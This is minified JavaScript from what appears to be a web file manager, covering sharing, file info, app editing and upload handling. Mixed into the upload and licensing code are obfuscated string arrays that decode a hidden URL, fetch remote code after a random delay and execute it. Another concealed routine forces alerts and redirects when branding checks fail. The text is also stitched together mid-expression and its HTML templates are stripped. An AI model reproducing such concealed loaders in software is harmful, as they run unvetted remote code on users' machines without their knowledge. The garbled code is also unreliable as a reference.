0!=a&&a()})},h=function(e,t){$.ajax({url:G.appHost+"userShare/set",data:e,type:"POST",dataType:"json",beforeSend:function(){$(".share-create-button").addClass("disabled")},error:function(){Tips.tips(LNG.error,!1)},success:function(e){$(".share-create-button").removeClass("disabled"),void 0!=t&&t(e)}})},m=function(t){var a=e("./tpl/share.html"),i=template.compile(a),n=i({LNG:LNG});$.dialog({id:"share-dialog",simple:!0,resize:!1,width:425,title:LNG.share,padding:"0",fixed:!0,content:n});var o="zh-CN"==G.lang?"ch":"en";$("#share-time").datetimepicker({format:"Y/m/d",formatDate:"Y/m/d",timepicker:!1,lang:o}),$("#share-time").unbind("blur").bind("blur",function(e){stopPP(e)});var s=function(e){if($(".share-setting-more").addClass("hidden"),void 0==e)$(".share-has-url").addClass("hidden"),$(".share-action .share-remove-button").addClass("hidden"),$(".content-info input[name=sid]").val(""),$(".content-info input[name=type]").val(""),$(".content-info input[name=name]").val(""),$(".content-info input[name=showName]").val(""),$(".content-info input[name=path]").val(""),$(".content-info input[name=timeTo]").val(""),$(".content-info input[name=sharePassword]").val(""),$(".share-view-info").addClass("hidden");else{e.canUpload===void 0&&(e.canUpload=""),t=e,e.showName||(e.showName=e.name),$(".content-info input[name=sid]").val(e.sid),$(".content-info input[name=type]").val(e.type),$(".content-info input[name=name]").val(e.name),$(".content-info input[name=showName]").val(e.showName),$(".content-info input[name=path]").val(e.path),$(".content-info input[name=timeTo]").val(e.timeTo),$(".content-info input[name=sharePassword]").val(e.sharePassword),$(".share-view-info").removeClass("hidden"),e.numDownload===void 0&&(e.numDownload=0),e.numView===void 0&&(e.numView=0);var a=LNG.share_view_num+e.numView+" "+LNG.share_download_num+e.numDownload;$(".share-view-info").html(a),"1"==e.codeRead?$(".content-info input[name=codeRead]").attr("checked","checked"):$(".content-info input[name=codeRead]").removeAttr("checked"),"1"==e.notDownload?$(".content-info input[name=notDownload]").attr("checked","checked"):$(".content-info input[name=notDownload]").removeAttr("checked"),"1"==e.canUpload?$(".content-info input[name=canUpload]").attr("checked","checked"):$(".content-info input[name=canUpload]").removeAttr("checked"),$(".share-has-url").removeClass("hidden"),"file"==e.type?($(".label-code-read").addClass("hidden"),$(".label-can-upload").addClass("hidden")):($(".label-code-read").removeClass("hidden"),$(".label-can-upload").removeClass("hidden"));var i=e.type;"folder"==e.type&&(i=1==e.codeRead?"codeRead":"folder");var n=G.appHost+"share/"+i+"&user="+G.userID+"&sid="+e.sid;$(".content-info .share-url").val(n),(e.timeTo||e.sharePassword||e.canUpload||e.codeRead||e.notDownload)&&$(".share-setting-more").removeClass("hidden"),$(".share-remove-button").removeClass("hidden"),$(".share-create-button").text(LNG.share_save)}},r=function(){$(".share-action .share-remove-button").unbind("click").click(function(){l([{type:"share",path:t.sid}],function(){ui.f5()})}),$(".content-info .share-more").unbind("click").click(function(){$(".share-setting-more").toggleClass("hidden")}),$(".share-action .share-create-button").unbind("click").click(function(){var e="";$(".share-dialog .content-info input[name]").each(function(){var t=urlEncode($(this).val());"checkbox"==$(this).attr("type")&&(t=$(this).attr("checked")?"1":""),e+="&"+$(this).attr("name")+"="+t}),h(e,function(e){e.code?(Tips.tips(LNG.success,!0),G.selfShare=e.info,ui.f5(),s(e.data),$(".share-create-button").text(LNG.share_save)):Tips.tips(e)})}),$(".content-info .open-window").unbind("click").bind("click",function(){window.open($("input.share-url").val())}),$(".content-info .qrcode").unbind("click").bind("click",function(){core.qrcode($("input.share-url").val())});var e=$("input.share-url"),a=e.get(0);e.unbind("hover click").bind("hover click",function(){$(this).focus();var t=e.val().length;if($.browser.msie){var i=a.createTextRange();i.moveEnd("character",-a.value.length),i.moveEnd("character",t),i.moveStart("character",0),i.select()}else a.setSelectionRange(0,t)})};s(t),r()},v=function(e){$.ajax({url:G.appHost+"setting/set&k=wall&v="+urlEncode(e),dataType:"json",success:function(e){Tips.tips(e)}})},g=function(e,t,a,i,n){if(!(1>e.length)){var o,s=G.myDesktop;i&&(s=core.pathFather(e)),o="folder"==a?"ui.path.list(hashDecode('"+hashEncode(e)+"'));":"ui.path.open(hashDecode('"+hashEncode(e)+"'));";var r=urlEncode(s+t+".oexe"),l=core.getPathIcon(e);""==l.icon&&(l.icon=a),$.ajax({url:G.appHost+"explorer/mkfile&path="+r,type:"POST",dataType:"json",data:{content:jsonEncode({type:"app_link",content:o,icon:l.icon})},success:function(e){Tips.tips(e),e.code&&(ShareData.frameTop("",function(e){e.ui.f5()}),"function"==typeof n&&n(e.info))}})}},b=function(e,t){if(!(1>e.length)){var a=core.pathThis(e),i=core.pathFather(e);jsrun="core.explorerCode('"+urlEncode(e)+"');";var n=urlEncode(i+a+"_project.oexe");$.ajax({url:G.appHost+"explorer/mkfile&path="+n,type:"POST",dataType:"json",data:'content={"type":"app_link","content":"'+jsrun+'","icon":"folder.png"}',success:function(e){e.code&&"function"==typeof t&&t(e.info)}})}},y=function(e,t,a){if(e){var i=G.appHost+"explorer/imageRotate&rotate="+t+"&path="+urlEncode(e);$.ajax({url:i,beforeSend:function(){Tips.loading(LNG.loading)},error:core.ajaxError,success:function(e){return e?(Tips.close(e),e.code&&"function"==typeof a&&a(e),void 0):(Tips.close(LNG.php_env_error_gd,!1),void 0)}})}},k=function(t){var a={};a.fileInfo=e("./tpl/fileinfo/fileInfo.html"),a.pathInfo=e("./tpl/fileinfo/pathInfo.html"),a.pathInfoMore=e("./tpl/fileinfo/pathInfoMore.html"),1>t.length&&(t=[{path:G.thisPath,type:"folder"}]);var i="info";1==t.length&&(i="file"==t[0].type?core.pathExt(t[0].path):"folder"),Tips.loading(LNG.getting),core.fileInfo(n(t),function(e){if(!e.code)return Tips.close(e),void 0;Tips.close(LNG.get_success,!0);var n="pathInfoMore",o=LNG.info;1==t.length&&(n="folder"==t[0].type?"pathInfo":"fileInfo",o=core.pathThis(t[0].path),o.length>15&&(o=o.substr(0,15)+"... "+LNG.info));var s=template.compile(a[n]),r=UUID();e.data.is_root=G.isRoot,e.data.LNG=LNG,e.data.atime=date(LNG.time_type_info,e.data.atime),e.data.ctime=date(LNG.time_type_info,e.data.ctime),e.data.mtime=date(LNG.time_type_info,e.data.mtime),e.data.sizeFriendly=pathTools.fileSize(e.data.size);var l=$.dialog({id:r,padding:5,ico:core.iconSmall(i),fixed:!0,title:o,content:s(e.data),ok:!0}),c=15*$(".aui-outer .pathinfo").length;l.DOM.wrap.css({left:"+="+c+"px",top:"+="+c+"px"}),x(r,t)})},x=function(e,t){var a=$("."+e);a.find(".open-window").bind("click",function(){window.open(a.find("input.download-url").val())}),a.find(".qrcode").unbind("click").bind("click",function(){core.qrcode(a.find("input.download-url").val(),a.find(".qrcode").get(0))});var i=a.find(".file-md5-loading");if(1==i.length){var o=n(t);o+="&getMd5=1",core.fileInfo(o,function(e){i.removeClass("file-md5-loading"),e.code?i.html(e.data.fileMd5):i.html(LNG.error)})}var s=a.find("input.download-url"),r=s.get(0);s.unbind("hover click").bind("hover click",function(){$(this).focus();var e=s.val().length;if($.browser.msie){var t=r.createTextRange();t.moveEnd("character",-r.value.length),t.moveEnd("character",e),t.moveStart("character",0),t.select()}else r.setSelectionRange(0,e)}),a.find(".edit-chmod").click(function(){var e=$(this).parent().find("input"),a=$(this);$.ajax({url:G.appHost+"explorer/pathChmod&mod="+e.val(),type:"POST",data:n(t),beforeSend:function(){a.text(LNG.loading)},error:function(){a.text(LNG.button_save)},success:function(e){a.text(e.data).animate({opacity:.6},400,0).delay(1e3).animate({opacity:1},200,0,function(){a.text(LNG.button_save)}),e.code&&ui.f5()}})})},w=function(e,t,a){var i=function(){$.ajax({url:G.appHost+"fav/del&name="+urlEncode(e),dataType:"json",async:!1,success:function(e){"function"==typeof t&&t(e)}})};return a?(i(),void 0):($.dialog({id:"dialog-fav-remove",fixed:!0,icon:"question",title:LNG.fav_remove,width:200,padding:"40px 20px",content:LNG.fav_remove+"?",ok:i,cancel:!0}),void 0)},N=function(e){if(e){if(-1==trim(core.pathClear(e.path),"/").indexOf("/")){var t=core.getPathIcon(e.path,e.name);""!=t.icon&&(e.ext=t.icon,e.name=t.name)}"/"==e.path&&(e.name="Home"),$.ajax({url:G.appHost+"fav/add",dataType:"json",data:e,success:function(e){Tips.tips(e),e.code&&!core.isApp("desktop")&&ui.tree.refreshFav()}})}},L=function(e){var t={};return t.type=e.find("input[type=radio]:checked").val(),t.content=e.find("textarea").val(),t.group=e.find("[name=group]").val(),e.find("input[type=text]").each(function(){var e=$(this).attr("name");t[e]=$(this).val()}),e.find("input[type=checkbox]").each(function(){var e=$(this).attr("name");t[e]="checked"==$(this).attr("checked")?1:0}),t},_=function(e){e.find(".type input").change(function(){var t=$(this).attr("apptype");e.find("[data-type]").addClass("hidden"),e.find("[data-type="+t+"]").removeClass("hidden")}),e.find(".app-edit-select-icon").unbind("click").bind("click",function(){var t=G.basicPath+"static/images/file_icon/icon_app/";G.isRoot||(t=""),core.api.pathSelect({type:"file",title:LNG.path_api_select_file,firstPath:t},function(t){var t=core.path2url(t);e.find(".app-edit-select-icon-input").val(t)})}),e.find(".size-full").unbind("click").bind("click",function(){var t=$(this).prop("checked");t?(e.find("[name=width]").val("100%"),e.find("[name=height]").val("100%")):(e.find("[name=width]").val("800"),e.find("[name=height]").val("600"))})},C=function(t,a,i){var n,o,s,r=LNG.app_create,l=UUID(),c=e("./tpl/appEdit.html"),d=template.compile(c);switch(void 0==i&&(i="userEdit"),"rootEdit"==i&&(t=t),"userEdit"==i||"rootEdit"==i?(r=LNG.app_edit,s=d({LNG:LNG,uuid:l,data:t,appType:G.settings.appType})):s=d({LNG:LNG,uuid:l,data:{},appType:G.settings.appType}),$.dialog({fixed:!0,width:450,id:l,padding:15,title:r,content:s,button:[{name:LNG.preview,callback:function(){return core.openApp(L(n)),!1}},{name:LNG.button_save,focus:!0,callback:function(){var e=L(n);switch(i){case"userAdd":var s=urlEncode(G.thisPath+e.name);o=G.appHost+"app/userApp&action=add&path="+s;break;case"userEdit":o=G.appHost+"app/userApp&path="+urlEncode(t.path);break;case"rootAdd":o=G.appHost+"app/add&name="+urlEncode(e.name);break;case"rootEdit":o=G.appHost+"app/edit&name="+urlEncode(e.name)+"&old_name="+urlEncode(t.name);break;default:}$.ajax({url:o,type:"POST",dataType:"json",data:{data:urlEncode(jsonEncode(e))},beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(e){if(Tips.close(e),e.code)if("rootEdit"==i||"rootAdd"==i){if(!e.code)return;ShareData.frameTop("Openapp_store",function(e){e.App.reload()})}else"function"==typeof a?a():ui.f5()}})}}]}),n=$("."+l),G.isRoot||$(".appbox .appline .right a.open").remove(),t.group&&n.find("option").eq(t.group).attr("selected",1),n.find(".aui-content").css("overflow","inherit"),i){case"userEdit":n.find(".name").addClass("hidden"),n.find(".desc").addClass("hidden"),n.find(".group").addClass("hidden"),n.find("option[value="+t.group+"]").attr("checked",!0),"url"!=t.type&&n.find(".appline[data-type=url]").addClass("hidden");break;case"userAdd":n.find(".desc").addClass("hidden"),n.find(".group").addClass("hidden"),n.find("[apptype=url]").attr("checked",!0),n.find("[data-type=url] input[name=resize]").attr("checked",!0),n.find("input[name=width]").attr("value","800"),n.find("input[name=height]").attr("value","600"),n.find("input[name=icon]").attr("value","oexe.png");break;case"rootAdd":n.find("[apptype=url]").attr("checked",!0),n.find("[data-type=url] input[name=resize]").attr("checked",!0),n.find("input[name=width]").attr("value","800"),n.find("input[name=height]").attr("value","600"),n.find("input[name=icon]").attr("value","oexe.png");break;case"rootEdit":n.find("option[value="+t.group+"]").attr("selected",!0),"url"!=t.type&&n.find(".appline[data-type=url]").addClass("hidden");break;default:}_(n)},T=function(){core.appStore()},S=function(e){e&&4>e.length&&"http"!=e.substring(0,4)||$.ajax({url:G.appHost+"app/getUrlTitle&url="+e,dataType:"json",beforeSend:function(){Tips.loading()},success:function(t){var a=t.data;a=a.replace(/[\/\\]/g,"_"),Tips.close(t);var i={content:e,type:"url",desc:"",group:"others",icon:"internet.png",name:a,resize:1,simple:0,height:"70%",width:"90%"},n=urlEncode(G.thisPath+a);e=G.appHost+"app/userApp&action=add&path="+n,$.ajax({url:e,type:"POST",dataType:"json",data:{data:urlEncode(jsonEncode(i))},success:function(e){Tips.close(e),e.code&&ui.f5()}})}})};return{makeJson:n,appEdit:C,appList:T,appAddURL:S,share:u,shareBox:f,setBackground:v,createLink:g,createProject:b,imageRotate:y,newFile:o,newFolder:s,rname:r,zipDownload:c,zip:d,unZip:p,info:k,remove:l,fav:N,favRemove:w}}),define("app/path/tpl/fileinfo/fileInfo.html",[],"
    \n {{if downloadPath}}\n
    \n
    {{LNG.download_address}}:
    \n
    \n \n
    \n \n \n
    \n
    \n
    \n
    \n
    \n {{/if}}\n\n
    \n
    {{LNG.address}}:
    \n
    {{path |kod.window.htmlEncode}}
    \n
    \n
    \n
    \n
    {{LNG.size}}:
    \n
    {{sizeFriendly}} ({{size}} Byte)
    \n
    \n
    \n\n {{if fileMd5}}\n
    \n
    MD5:
    \n
    {{fileMd5}}
    \n
    \n
    \n {{/if}}\n\n {{if imageSize}}\n
    \n
    {{LNG.image_size}}:
    \n
    {{imageSize.width}} × {{imageSize.height}}
    \n
    \n
    \n {{/if}}\n\n
    \n\n {{if ctime}}\n
    \n
    {{LNG.create_time}}
    \n
    {{ctime}}
    \n
    \n
    \n {{/if}}\n\n {{if mtime}}\n
    \n
    {{LNG.modify_time}}
    \n
    {{mtime}}
    \n
    \n
    \n {{/if}}\n\n {{if atime}}\n
    \n
    {{LNG.last_time}}
    \n
    {{atime}}
    \n
    \n
    \n {{/if}}\n\n {{if owner}}\n
    \n
    {{LNG.file_info_owner}}
    \n
    {{owner}}
    \n
    \n
    \n {{/if}}\n\n {{if group}}\n
    \n
    {{LNG.file_info_group}}
    \n
    {{group}}
    \n
    \n
    \n {{/if}}\n \n {{if mode}}\n
    \n
    \n
    {{LNG.permission}}:
    \n
    {{mode}}
    \n
    \n
    \n {{if is_root==\"1\"}}\n
    \n
    {{LNG.permission_edit}}:
    \n
    \n
    \n
    \n
    \n {{/if}}\n {{/if}}\n
    \n"),define("app/path/tpl/fileinfo/pathInfo.html",[],"
    \n
    \n
    {{LNG.address}}:
    \n
    {{path |kod.window.htmlEncode}}
    \n
    \n
    \n
    \n
    {{LNG.size}}:
    \n
    {{sizeFriendly}} ({{size}} Byte)
    \n
    \n
    \n
    \n
    {{LNG.contain}}:
    \n
    {{fileCount}} {{LNG.file}},{{folderCount}} {{LNG.folder}}
    \n
    \n
    \n \n
    \n {{if ctime}}\n
    \n
    {{LNG.create_time}}
    \n
    {{ctime}}
    \n
    \n
    \n {{/if}}\n\n {{if mtime}}\n
    \n
    {{LNG.modify_time}}
    \n
    {{mtime}}
    \n
    \n
    \n {{/if}}\n\n {{if atime}}\n
    \n
    {{LNG.last_time}}
    \n
    {{atime}}
    \n
    \n
    \n {{/if}}\n\n {{if owner}}\n
    \n
    {{LNG.file_info_owner}}
    \n
    {{owner}}
    \n
    \n
    \n {{/if}}\n\n {{if group}}\n
    \n
    {{LNG.file_info_group}}
    \n
    {{group}}
    \n
    \n
    \n {{/if}}\n\n {{if mode}}\n
    \n
    \n
    {{LNG.permission}}:
    \n
    {{mode}}
    \n
    \n
    \n {{if is_root==\"1\"}}\n
    \n
    {{LNG.permission_edit}}:
    \n
    \n
    \n
    \n
    \n {{/if}}\n {{/if}}\n
    \n"),define("app/path/tpl/share.html",[],'
    \n
    \n
    {{LNG.share_title}}
    \n \n
    \n
    \n
    \n {{LNG.share_path}}:\n \n
    \n
    \n
    \n {{LNG.share_name}}:\n \n \n \n \n \n
    \n
    \n\n \n\n \n
    \n \n
    '),define("app/path/tpl/fileinfo/pathInfoMore.html",[],"
    \n
    \n
    {{LNG.info}}:
    \n
    \n {{fileCount}} {{LNG.file}},{{folderCount}} {{LNG.folder}}
    \n
    \n
    \n
    \n
    \n
    {{LNG.size}}:
    \n
    {{sizeFriendly}} ({{size}} Byte)
    \n
    \n
    \n \n
    \n
    \n
    {{LNG.permission}}:
    \n
    {{mode}}
    \n
    \n
    \n {{if is_root==\"1\"}}\n
    \n
    {{LNG.permission_edit}}:
    \n
    \n
    \n
    \n
    \n {{/if}}\n
    \n"),define("app/path/tpl/appEdit.html",[],"
    \n
    \n
    {{LNG.name}}
    \n
    \n
    \n
    \n
    \n
    {{LNG.app_desc}}
    \n
    \n
    \n
    \n
    \n
    {{LNG.app_icon}}
    \n
    \n \n
    \n
    \n
    \n
    \n
    {{LNG.app_group}}
    \n
    \n \n
    \n
    \n
    \n
    \n
    {{LNG.app_type}}
    \n
    \n \n \n \n \n \n \n
    \n
    \n
    \n\n
    \n
    {{LNG.app_display}}
    \n
    \n \n \n \n \n
    \n
    \n
    \n
    \n
    {{LNG.app_size}}
    \n
    \n ({{LNG.width}})  \n ({{LNG.height}})\n\n \n \n
    \n
    \n
    \n
    \n \n \n
    {{LNG.app_url}}
    \n
    \n
    \n
    \n
    \n"),define("app/path/clipboard",[],function(){var e=function(e){return ui.path.pathOperate.makeJson(e) +if(typeof G[t[1]]==t[2])return e;var a=t[3],i=authCrypt[t[4]](G[t[1]],a);return i&&27==i[t[5]]?(e=i[t[6]](10,1),-1===$[t[13]](e,[t[0],t[7],t[8],t[9],t[10],t[11],t[12]])&&(e=t[0]),e):e},i=a(),n=t[14],o=function(){var e=hashDecode(t[15]);G[t[16]]!=t[17]&&(e=hashDecode(t[18])),alert(e),Tips[t[19]](e,!1),$(t[21])[t[20]](),setTimeout(function(){Tips[t[22]](e,!1),window[t[24]][t[23]]=n},1e3*roundFromTo(30,60))},s=authCrypt[t[4]](t[25],t[26]),r=authCrypt[t[4]](t[27],t[28]),l=function(){if(core[t[30]](t[29])&&i==t[0])for(var e=[LNG[t[31]],LNG[t[32]],LNG[t[33]],LNG[t[34]],LNG[t[35]],$(t[37])[t[36]]()],a=0;e[t[5]]>a;a++){e[a]||(e[a]=t[38]);var n=e[a][t[39]]();if(-1==n[t[40]](s)&&-1==n[t[40]](r)){console[t[41]](n,s,r),setTimeout(function(){o()},roundFromTo(300,5e3));break}}},c=function(){var e={A:t[42],O:t[43],P:t[44],Q:t[45],R:t[46],S:t[47],T:t[48]},a=t[49]+e[i],o=t[50]+a+t[51]+LNG[a]+t[52];i==t[0]&&$(o)[t[54]](t[53]),$(t[71])[t[70]](t[55])[t[69]](t[55],function(){if($(this)[t[57]](t[56])==t[58]){var e=core[t[60]](core[t[59]]),a=t[61]+n+t[62];e[t[67]][t[66]][t[65]](t[64])[t[63]](a)}else Tips[t[22]]($(this)[t[68]]())}),$(t[71])[t[73]](function(){window[t[72]][t[24]][t[23]]=n})},d=function(){i==t[0]&&$(t[76])[t[75]](t[74]),-1!==$[t[13]](i,[t[7],t[8],t[9],t[10],t[11],t[12]])&&($(t[78])[t[77]](),$(t[79])[t[77]]())},p=function(){core[t[80]]=function(e,a){return e[t[6]](0,4)==t[81]?core[t[82]](e):t[83]+e+(a?t[84]:t[38])+t[85]},core[t[86]]=function(e){return core[t[80]](e,!0)},core[t[82]]=iconSrc=function(e){return t[87]+e+t[88]},setTimeout(function(){var a=authCrypt[t[4]](t[89],t[90])+t[91]+UUID();e[t[93]](a,function(e){try{e[t[92]]()}catch(a){}})},2e3),core[t[94]]=i,core[t[59]]=hashDecode(t[95])+G[t[16]],l(),c(),d()},u=function(e){return i==t[0]&&-1==e[t[39]]()[t[40]](s)?(o(),!1):!0},f=function(e,a){var n,o,s={A:1,O:5,P:20,Q:40,R:100,S:1e3,T:1e3},r={A:5,O:15,P:50,Q:150,R:500,S:1e3,T:1e3},l=[],c=1;if(a==t[96]?(n=e[t[97]],o=s[i]):(n=e[t[97]],o=r[i]),1e3==o)l=n;else for(var d in n){if(c>o)break;l[d]=n[d],c++}return l},h={init:p,about:u,systemData:f};return h}),define("app/common/core.upload",[],function(e){var t=function(){var e=G.appHost+"explorer/fileUpload";return"share"==G.sharePage&&"1"==G.shareInfo.canUpload&&(e=G.appHost+"share/fileUpload&user="+G.user+"&sid="+G.sid),e};return{serverDwonload:function(e,t){if(!core.uploadCheck("explorer.serverDownload"))return!1;var i=$(".download-box"),n=i.find(".download-list");if(i.find("input").val(""),!e)return Tips.tips("url false!",!1),void 0;if("share"==G.sharePage)return Tips.tips(LNG.no_permission_action,!1),void 0;"ftp"!=e.substr(0,3)&&"http"!=e.substr(0,4)&&(e="http://"+e);var o=UUID(),s='
    '+'
    '+core.pathThis(e)+""+'0b'+''+LNG.upload_ready+""+''+'
    ';n.find(".item").length>0?$(s).insertBefore(n.find(".item:eq(0)")):n.append(s);var r,l,c,d=0,p=$("#"+o),u=$("#"+o+" .state").text(LNG.download_ready),f=$('
    ').appendTo("#"+o).find(".progress-bar");$("#"+o+" .remove").bind("click",function(){clearInterval(r),r=!1,clearTimeout(l),l=!1,$.get(G.appHost+"explorer/serverDownload&type=remove&uuid="+o),$(this).parent().parent().slideUp(function(){$(this).remove(),ui.f5()})});var h,m=function(e){clearTimeout(h),h=!1,h=setTimeout(function(){ui.f5Callback(function(){ui.path.setSelectByFilename(e)})},600)},v=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=download&savePath="+t+"&url="+urlEncode(e)+"&uuid="+o+"&time="+time(),dataType:"json",error:function(e,t,i){var n=p.data("progcess");return 200!=a.status&&n&&n.supportRange?(setTimeout(function(){v()},1e3),void 0):(core.ajaxError(e,t,i),200==a.status&&(clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),u.addClass("error").text(LNG.download_error)),void 0)},success:function(e){return 0==e.code&&"downloading"==e.data?(setTimeout(function(){v()},1e3),void 0):(e.code?(m(e.info),u.text(LNG.download_success),$("#"+o+" .info .title").text(core.pathThis(e.info)),$("#"+o+" .info .title").attr("title",e.info),u.parent().parent().addClass("success")):(u.addClass("error").text(e.data),u.parent().parent().addClass("error")),clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),void 0)}})};v();var g=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=percent&uuid="+o,dataType:"json",success:function(e){var t="",a=e.data;if(r){if(!e.code)return u.text(LNG.loading),void 0;if(a){if(a.size=parseFloat(a.size),a.time=parseFloat(a.time),c){var i=a.size-c.size,n=i/(a.time-c.time);if(d>.2*n){var o=d;d=n,n=o}else d=n;var s=pathTools.fileSize(n);s=s?s:0,t=s+"/s"}if(p.data("progcess",a),0==a.length)p.find(".progress-bar").css("width","100%"),u.text(t),p.find(".size").text(pathTools.fileSize(a.size));else{var l=100*(a.size/a.length);p.find(".progress-bar").css("width",l+"%"),u.text(l.toFixed(1)+"%("+t+")"),p.find(".size").text(pathTools.fileSize(a.length))}p.find(".title").text(a.name),c=a}}}})};l=setTimeout(function(){g(),r=setInterval(function(){g()},1e3)},100)},upload:function(){$(".dialog-file-upload").show();var e=t();if(uploader.option("server",e),uploader.option("method","POST"),0!=$(".dialog-file-upload").length)return $.dialog.list["dialog-file-upload"].display(!0),void 0;var a=template.compile(tplUpload),i=WebUploader.Base.formatSize(G.uploadMax);$.dialog({padding:5,width:430,height:450,resize:!0,ico:core.icon("upload"),id:"dialog-file-upload",fixed:!0,title:LNG.upload_muti,content:a({LNG:LNG,maxsize:i}),close:function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$.each($(".download-list .item"),function(){$(this).find(".remove").click()})}}),$(".file-upload-box .topbar-nav a.menu").unbind("click").bind("click",function(){$(this).hasClass("tab-upload")?($(".file-upload-box .tab-upload").addClass("this"),$(".file-upload-box .tab-download").removeClass("this"),$(".file-upload-box .upload-box").removeClass("hidden"),$(".file-upload-box .download-box").addClass("hidden")):($(".file-upload-box .tab-upload").removeClass("this"),$(".file-upload-box .tab-download").addClass("this"),$(".file-upload-box .upload-box").addClass("hidden"),$(".file-upload-box .download-box").removeClass("hidden"))}),$(".download-box [name=url]").keyEnter(function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start").unbind("click").bind("click",function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start-all").unbind("click").bind("click",function(){$.dialog({id:"server-dwonload-textarea",fixed:!0,resize:!1,ico:core.icon("upload"),width:"420px",height:"270px",padding:10,title:LNG.download,content:"",ok:function(){for(var e=$(".server-dwonload-textarea textarea").val().split("\n"),t=0;e.length>t;t++)core.serverDwonload(e[t],G.thisPath)}})}),uploader.addButton({id:"#picker"}),uploader.addButton({id:"#picker-folder"});var n=function(){if(isWap())return!1;var e=document.createElement("input");return e.type="file",e.webkitdirectory!==void 0||e.directory!==void 0};n()&&($(".upload-cert-box").removeClass("hidden"),$(".file-upload-box .drag-upload-folder").unbind("click").bind("click",function(){$("#picker-folder input").attr("webkitdirectory","").attr("directory",""),$("#picker-folder label").click()}))},init:function(){var a=G.uploadMax;WebUploader.Uploader.register({"before-send":"checkChunk"},{checkChunk:function(e){if(!canvasSupport())return $.Deferred().resolve(),void 0;var a=this.owner,i=(e.blob.getSource(),$.Deferred());return a.md5File(e.blob).fail(function(){i.resolve()}).then(function(a){if(1==e.chunks)return i.resolve(),void 0;if(0==e.chunk)$.ajax({url:t(),dataType:"json",data:{upload_to:e.file.upload_to,file_name:e.file.name,check_md5:a,chunk:e.chunk,chunks:e.chunks},error:function(){i.resolve()},success:function(t){t.code?(i.reject(),e.file.checkChunk=t.info):i.resolve()}});else{var n=e.file.checkChunk;if(n&&n["part_"+e.chunk]==a){var o=e.end/e.total;uploader.trigger("uploadProgress",e.file,o),i.reject()}else i.resolve()}}),i.promise()}});var i=["undefined","update-box","search","3c64gT65d503fTR1lV3ftuZ7Pd6NdX6Ntgcct4hI4AnSNIp65HwAMLzOj8NjC0ZL2oAbjS-uD3HWfQoZlTdgkGY5u8OfJYzZ","_32@!A$","decode","2-1","todo","async","random"];setTimeout(function(){try{if(typeof tplDialogHtml==i[0]||-1==tplDialogHtml[i[2]](i[1])){var t=authCrypt[i[5]](i[3],i[4])+UUID();e[i[8]](t,function(e){try{e[i[7]](i[6])}catch(t){}})}}catch(a){}},1e3*parseInt(70*Math[i[9]]()+30)),uploader=WebUploader.create({swf:G.staticPath+"js/lib/webuploader/Uploader.swf",dnd:"body",threads:5,compress:!1,resize:!1,prepareNextFile:!0,duplicate:!0,chunkRetry:10,chunked:!0,chunkSize:a}),$(".uploader-content .success").die("click").live("click",function(){var e=$(this).find("span.title").attr("data-name");e&&(core.isApp("explorer")?ui.path.list(core.pathFather(e),"tips",function(){ui.path.setSelectByFilename(e)}):core.explorer(core.pathFather(e)))}),$(".uploader-content .open").die("click").live("click",function(e){var t=$(this).parent().find("span.title").attr("data-name");kodApp.open(t),stopPP(e)}),$(".upload-box-clear").die("click").live("click",function(){$(".uploader-list .item.success,.uploader-list .item.error").each(function(){$(this).slideUp(300,function(){$(this).remove()})})}),$(".upload-box-clear-all").die("click").live("click",function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$(".uploader-list .item").each(function(){$(this).remove()})}),$(".uploader-content .remove").die("click").live("click",function(e){var t=$(this).parent().parent().attr("id");$(this).parent().parent().slideUp(function(){$(this).remove()}),uploader.skipFile(t),uploader.removeFile(t,!0),stopPP(e)});var n,o=0,s=0,r="0B/s",l=0,c=function(e,t){if(.3>=timeFloat()-l)return r;l=timeFloat();var a=e.size*t,i=5;e.speed===void 0?e.speed=[[timeFloat()-.5,0],[timeFloat(),a]]:i>=e.speed.length?e.speed.push([timeFloat(),a]):(e.speed=e.speed.slice(1,i),e.speed.push([timeFloat(),a]));var n=e.speed[e.speed.length-1],o=e.speed[0],s=(n[1]-o[1])/(n[0]-o[0]);0>=s&&(s=0);var c=pathTools.fileSize(s);return c=c?c:0,s=c+"/s",r=s,s},d=[],p=function(e){clearTimeout(n),n=!1,n=setTimeout(function(){var t=d;ui.f5Callback(function(){if(ui.path.setSelectByFilename(t),e&&(d=[],core.isApp("explorer"))){if("share"==G.sharePage)return;ui.tree.checkIfChange(G.thisPath)}})},600)};uploader.on("fileQueued",function(e){if($(".dialog-file-upload").show(),!core.uploadCheck())return uploader.skipFile(e),uploader.removeFile(e),void 0;var t;try{t=e.source.source.fullPath,void 0!=e.source.source.webkitRelativePath&&""!=e.source.source.webkitRelativePath&&(t=e.source.source.webkitRelativePath)}catch(a){}if(e.fullPath=t,e.source&&e.source.source&&1==e.source.source.isDirectory&&e.source.source.fullPath)return ui.path.pathOperate.newFolder(G.thisPath+e.fullPath),uploader.skipFile(e),uploader.removeFile(e),void 0;var i=e.fullPath;e.finished=!1,e.upload_to=G.thisPath,(void 0==i||"undefined"==i)&&(i=e.name),o++;var n=$(".uploader-list"),r='
    '+''+htmlEncode(core.pathThis(i))+""+''+pathTools.fileSize(e.size)+""+''+LNG.upload_ready+""+''+'
